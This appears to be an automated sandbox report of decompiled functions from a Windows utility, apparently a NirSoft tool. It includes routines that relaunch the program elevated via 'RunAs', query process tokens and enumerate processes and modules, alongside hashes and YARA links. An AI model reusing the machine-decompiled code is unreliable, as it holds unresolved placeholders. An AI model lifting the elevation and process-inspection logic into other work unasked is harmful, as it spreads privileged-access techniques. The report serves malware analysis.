_snwprintf.MSVCRT ref: 0040458A

Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57

Strings

:, xrefs: 004044E3
"%s",0, xrefs: 0040457D
%s\shell\%s, xrefs: 00404564
C:\, xrefs: 004044F1
%s\shell\%s\command, xrefs: 00404462

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
API String ID: 486436031-734527199
Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}

APIs

memset.MSVCRT ref: 00406484
memset.MSVCRT ref: 004064A0

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128

wcscpy.MSVCRT ref: 004064E4
wcscpy.MSVCRT ref: 004064F3
wcscpy.MSVCRT ref: 00406503
EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
wcscpy.MSVCRT ref: 0040657A

Strings

RTL, xrefs: 00406549
TranslatorURL, xrefs: 00406520
Version, xrefs: 00406536
TranslatorName, xrefs: 0040650F
SFM, xrefs: 00406502
strings, xrefs: 00406574
general, xrefs: 004064F8

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3037099051-2314623505
Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}

APIs

GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
memset.MSVCRT ref: 00401C4F
memset.MSVCRT ref: 00401C68

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00401C8F
memset.MSVCRT ref: 00401C9B
ShellExecuteExW.SHELL32(?), ref: 00401CD5
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
GetExitCodeProcess.KERNEL32 ref: 00401CF6
GetLastError.KERNEL32 ref: 00401D0E

Strings

RunAs, xrefs: 00401CC0
@, xrefs: 00401CC7
<, xrefs: 00401CB9
/SpecialRun %I64x %d, xrefs: 00401C84

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
String ID: /SpecialRun %I64x %d$<$@$RunAs
API String ID: 903100921-3385179869
Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}

APIs

memset.MSVCRT ref: 00409AB7
memset.MSVCRT ref: 00409ACF
OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
_snwprintf.MSVCRT ref: 00409C5A

Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8

memset.MSVCRT ref: 00409B25
GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
memset.MSVCRT ref: 00409BC7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34

Strings

Y@, xrefs: 00409BA9
GetTokenInformation, xrefs: 00409B43
%s\%s, xrefs: 00409C51

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
String ID: %s\%s$GetTokenInformation$Y@
API String ID: 3504373036-27875219
Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
FreeLibrary.KERNEL32(00000000), ref: 00409202

Strings

GetModuleInformation, xrefs: 004091DC
EnumProcesses, xrefs: 004091CB
psapi.dll, xrefs: 00409180
GetModuleFileNameExW, xrefs: 004091BA
GetModuleBaseNameW, xrefs: 00409198
EnumProcessModules, xrefs: 004091A9

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Freememsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1182944575-70141382
Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C

Uniqueness

Uniqueness Score: -1.00%

Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

Process32First, xrefs: 00409143
Module32First, xrefs: 00409121
Process32Next, xrefs: 00409154
Module32Next, xrefs: 00409132
kernel32.dll, xrefs: 004090F8
CreateToolhelp32Snapshot, xrefs: 00409110

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<table dir="rtl"><tr><td>, xrefs: 00408284
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

